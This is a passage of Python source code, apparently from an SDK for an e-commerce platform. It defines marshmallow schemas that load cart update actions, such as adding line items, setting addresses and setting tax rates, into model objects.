        nested=helpers.absmod(
            __name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCategory",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # The "action" discriminator is implied by the model class, so drop it.
        del data["action"]
        return models.CartAddCustomLineItemAction(**data)
class CartAddDiscountCodeActionSchema(CartUpdateActionSchema):
    """Schema for the `addDiscountCode` cart update action; loads into
    :class:`models.CartAddDiscountCodeAction`."""

    code = marshmallow.fields.String(allow_none=True, missing=None)
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartAddDiscountCodeAction(**data)
class CartAddItemShippingAddressActionSchema(CartUpdateActionSchema):
    """Schema for the `addItemShippingAddress` cart update action; loads into
    :class:`models.CartAddItemShippingAddressAction`."""

    address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartAddItemShippingAddressAction(**data)
class CartAddLineItemActionSchema(CartUpdateActionSchema):
    """Schema for the `addLineItem` cart update action; loads into
    :class:`models.CartAddLineItemAction`.

    The line item may be identified by ``productId``+``variantId`` or by
    ``sku`` (all optional here; validation happens server-side).
    """

    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    distribution_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="distributionChannel",
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    product_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="productId",
    )
    variant_id = marshmallow.fields.Integer(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="variantId",
    )
    sku = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    quantity = marshmallow.fields.Integer(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    supply_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="supplyChannel",
    )
    external_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalPrice",
    )
    external_total_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTotalPrice",
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartAddLineItemAction(**data)
class CartAddPaymentActionSchema(CartUpdateActionSchema):
    """Schema for the `addPayment` cart update action; loads into
    :class:`models.CartAddPaymentAction`."""

    payment = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".payment.PaymentResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartAddPaymentAction(**data)
class CartAddShoppingListActionSchema(CartUpdateActionSchema):
    """Schema for the `addShoppingList` cart update action; loads into
    :class:`models.CartAddShoppingListAction`."""

    shopping_list = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".shopping_list.ShoppingListResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="shoppingList",
    )
    supply_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="supplyChannel",
    )
    distribution_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="distributionChannel",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartAddShoppingListAction(**data)
class CartApplyDeltaToCustomLineItemShippingDetailsTargetsActionSchema(
    CartUpdateActionSchema
):
    """Schema for the `applyDeltaToCustomLineItemShippingDetailsTargets`
    cart update action; loads into
    :class:`models.CartApplyDeltaToCustomLineItemShippingDetailsTargetsAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    targets_delta = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="targetsDelta",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartApplyDeltaToCustomLineItemShippingDetailsTargetsAction(**data)
class CartApplyDeltaToLineItemShippingDetailsTargetsActionSchema(
    CartUpdateActionSchema
):
    """Schema for the `applyDeltaToLineItemShippingDetailsTargets` cart
    update action; loads into
    :class:`models.CartApplyDeltaToLineItemShippingDetailsTargetsAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    targets_delta = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingTargetSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="targetsDelta",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartApplyDeltaToLineItemShippingDetailsTargetsAction(**data)
class CartChangeCustomLineItemMoneyActionSchema(CartUpdateActionSchema):
    """Schema for the `changeCustomLineItemMoney` cart update action; loads
    into :class:`models.CartChangeCustomLineItemMoneyAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    money = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartChangeCustomLineItemMoneyAction(**data)
class CartChangeCustomLineItemQuantityActionSchema(CartUpdateActionSchema):
    """Schema for the `changeCustomLineItemQuantity` cart update action;
    loads into :class:`models.CartChangeCustomLineItemQuantityAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartChangeCustomLineItemQuantityAction(**data)
class CartChangeLineItemQuantityActionSchema(CartUpdateActionSchema):
    """Schema for the `changeLineItemQuantity` cart update action; loads
    into :class:`models.CartChangeLineItemQuantityAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    external_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalPrice",
    )
    external_total_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTotalPrice",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartChangeLineItemQuantityAction(**data)
class CartChangeTaxCalculationModeActionSchema(CartUpdateActionSchema):
    """Schema for the `changeTaxCalculationMode` cart update action; loads
    into :class:`models.CartChangeTaxCalculationModeAction`."""

    # Serialized by enum value (the API string), not by member name.
    tax_calculation_mode = marshmallow_enum.EnumField(
        TaxCalculationMode,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="taxCalculationMode",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartChangeTaxCalculationModeAction(**data)
class CartChangeTaxModeActionSchema(CartUpdateActionSchema):
    """Schema for the `changeTaxMode` cart update action; loads into
    :class:`models.CartChangeTaxModeAction`."""

    tax_mode = marshmallow_enum.EnumField(
        TaxMode, by_value=True, allow_none=True, missing=None, data_key="taxMode"
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartChangeTaxModeAction(**data)
class CartChangeTaxRoundingModeActionSchema(CartUpdateActionSchema):
    """Schema for the `changeTaxRoundingMode` cart update action; loads
    into :class:`models.CartChangeTaxRoundingModeAction`."""

    tax_rounding_mode = marshmallow_enum.EnumField(
        RoundingMode,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="taxRoundingMode",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartChangeTaxRoundingModeAction(**data)
class CartRecalculateActionSchema(CartUpdateActionSchema):
    """Schema for the `recalculate` cart update action; loads into
    :class:`models.CartRecalculateAction`."""

    update_product_data = marshmallow.fields.Boolean(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="updateProductData",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartRecalculateAction(**data)
class CartRemoveCustomLineItemActionSchema(CartUpdateActionSchema):
    """Schema for the `removeCustomLineItem` cart update action; loads into
    :class:`models.CartRemoveCustomLineItemAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartRemoveCustomLineItemAction(**data)
class CartRemoveDiscountCodeActionSchema(CartUpdateActionSchema):
    """Schema for the `removeDiscountCode` cart update action; loads into
    :class:`models.CartRemoveDiscountCodeAction`."""

    discount_code = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".discount_code.DiscountCodeReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="discountCode",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartRemoveDiscountCodeAction(**data)
class CartRemoveItemShippingAddressActionSchema(CartUpdateActionSchema):
    """Schema for the `removeItemShippingAddress` cart update action; loads
    into :class:`models.CartRemoveItemShippingAddressAction`."""

    address_key = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="addressKey"
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartRemoveItemShippingAddressAction(**data)
class CartRemoveLineItemActionSchema(CartUpdateActionSchema):
    """Schema for the `removeLineItem` cart update action; loads into
    :class:`models.CartRemoveLineItemAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    quantity = marshmallow.fields.Integer(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    external_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalPrice",
    )
    external_total_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTotalPrice",
    )
    shipping_details_to_remove = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetailsToRemove",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartRemoveLineItemAction(**data)
class CartRemovePaymentActionSchema(CartUpdateActionSchema):
    """Schema for the `removePayment` cart update action; loads into
    :class:`models.CartRemovePaymentAction`."""

    payment = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".payment.PaymentResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartRemovePaymentAction(**data)
class CartSetAnonymousIdActionSchema(CartUpdateActionSchema):
    """Schema for the `setAnonymousId` cart update action; loads into
    :class:`models.CartSetAnonymousIdAction`."""

    anonymous_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="anonymousId",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetAnonymousIdAction(**data)
class CartSetBillingAddressActionSchema(CartUpdateActionSchema):
    """Schema for the `setBillingAddress` cart update action; loads into
    :class:`models.CartSetBillingAddressAction`."""

    address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetBillingAddressAction(**data)
class CartSetCartTotalTaxActionSchema(CartUpdateActionSchema):
    """Schema for the `setCartTotalTax` cart update action; loads into
    :class:`models.CartSetCartTotalTaxAction`."""

    external_total_gross = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="externalTotalGross",
    )
    external_tax_portions = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxPortionDraftSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxPortions",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCartTotalTaxAction(**data)
class CartSetCountryActionSchema(CartUpdateActionSchema):
    """Schema for the `setCountry` cart update action; loads into
    :class:`models.CartSetCountryAction`."""

    country = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCountryAction(**data)
class CartSetCustomFieldActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomField` cart update action; loads into
    :class:`models.CartSetCustomFieldAction`."""

    name = marshmallow.fields.String(allow_none=True, missing=None)
    # Raw: a custom field value may be any JSON type.
    value = marshmallow.fields.Raw(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomFieldAction(**data)
class CartSetCustomLineItemCustomFieldActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomLineItemCustomField` cart update action;
    loads into :class:`models.CartSetCustomLineItemCustomFieldAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    name = marshmallow.fields.String(allow_none=True, missing=None)
    value = marshmallow.fields.Raw(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomLineItemCustomFieldAction(**data)
class CartSetCustomLineItemCustomTypeActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomLineItemCustomType` cart update action;
    loads into :class:`models.CartSetCustomLineItemCustomTypeAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    type = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.TypeResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    fields = FieldContainerField(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomLineItemCustomTypeAction(**data)
class CartSetCustomLineItemShippingDetailsActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomLineItemShippingDetails` cart update action;
    loads into :class:`models.CartSetCustomLineItemShippingDetailsAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomLineItemShippingDetailsAction(**data)
class CartSetCustomLineItemTaxAmountActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomLineItemTaxAmount` cart update action;
    loads into :class:`models.CartSetCustomLineItemTaxAmountAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    external_tax_amount = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxAmountDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxAmount",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomLineItemTaxAmountAction(**data)
class CartSetCustomLineItemTaxRateActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomLineItemTaxRate` cart update action; loads
    into :class:`models.CartSetCustomLineItemTaxRateAction`."""

    custom_line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="customLineItemId"
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomLineItemTaxRateAction(**data)
class CartSetCustomShippingMethodActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomShippingMethod` cart update action; loads
    into :class:`models.CartSetCustomShippingMethodAction`."""

    shipping_method_name = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="shippingMethodName"
    )
    shipping_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".shipping_method.ShippingRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="shippingRate",
    )
    tax_category = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCategory",
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomShippingMethodAction(**data)
class CartSetCustomTypeActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomType` cart update action; loads into
    :class:`models.CartSetCustomTypeAction`."""

    type = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.TypeResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    fields = FieldContainerField(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomTypeAction(**data)
class CartSetCustomerEmailActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomerEmail` cart update action; loads into
    :class:`models.CartSetCustomerEmailAction`."""

    email = marshmallow.fields.String(allow_none=True, missing=None)
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomerEmailAction(**data)
class CartSetCustomerGroupActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomerGroup` cart update action; loads into
    :class:`models.CartSetCustomerGroupAction`."""

    customer_group = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".customer_group.CustomerGroupResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerGroup",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomerGroupAction(**data)
class CartSetCustomerIdActionSchema(CartUpdateActionSchema):
    """Schema for the `setCustomerId` cart update action; loads into
    :class:`models.CartSetCustomerIdAction`."""

    customer_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerId",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetCustomerIdAction(**data)
class CartSetDeleteDaysAfterLastModificationActionSchema(CartUpdateActionSchema):
    """Schema for the `setDeleteDaysAfterLastModification` cart update
    action; loads into
    :class:`models.CartSetDeleteDaysAfterLastModificationAction`."""

    delete_days_after_last_modification = marshmallow.fields.Integer(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="deleteDaysAfterLastModification",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetDeleteDaysAfterLastModificationAction(**data)
class CartSetKeyActionSchema(CartUpdateActionSchema):
    """Schema for the `setKey` cart update action; loads into
    :class:`models.CartSetKeyAction`."""

    key = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetKeyAction(**data)
class CartSetLineItemCustomFieldActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemCustomField` cart update action; loads
    into :class:`models.CartSetLineItemCustomFieldAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    name = marshmallow.fields.String(allow_none=True, missing=None)
    value = marshmallow.fields.Raw(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemCustomFieldAction(**data)
class CartSetLineItemCustomTypeActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemCustomType` cart update action; loads
    into :class:`models.CartSetLineItemCustomTypeAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    type = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.TypeResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    fields = FieldContainerField(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemCustomTypeAction(**data)
class CartSetLineItemDistributionChannelActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemDistributionChannel` cart update action;
    loads into :class:`models.CartSetLineItemDistributionChannelAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    distribution_channel = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="distributionChannel",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemDistributionChannelAction(**data)
class CartSetLineItemPriceActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemPrice` cart update action; loads into
    :class:`models.CartSetLineItemPriceAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    external_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.MoneySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalPrice",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemPriceAction(**data)
class CartSetLineItemShippingDetailsActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemShippingDetails` cart update action;
    loads into :class:`models.CartSetLineItemShippingDetailsAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    shipping_details = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingDetails",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemShippingDetailsAction(**data)
class CartSetLineItemTaxAmountActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemTaxAmount` cart update action; loads into
    :class:`models.CartSetLineItemTaxAmountAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    external_tax_amount = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxAmountDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxAmount",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
        return models.CartSetLineItemTaxAmountAction(**data)
class CartSetLineItemTaxRateActionSchema(CartUpdateActionSchema):
    """Schema for the `setLineItemTaxRate` cart update action; loads into
    :class:`models.CartSetLineItemTaxRateAction`."""

    line_item_id = marshmallow.fields.String(
        allow_none=True, missing=None, data_key="lineItemId"
    )
    external_tax_rate = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRate",
    )
    class Meta:
        unknown = marshmallow.EXCLUDE
    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        del data["action"]
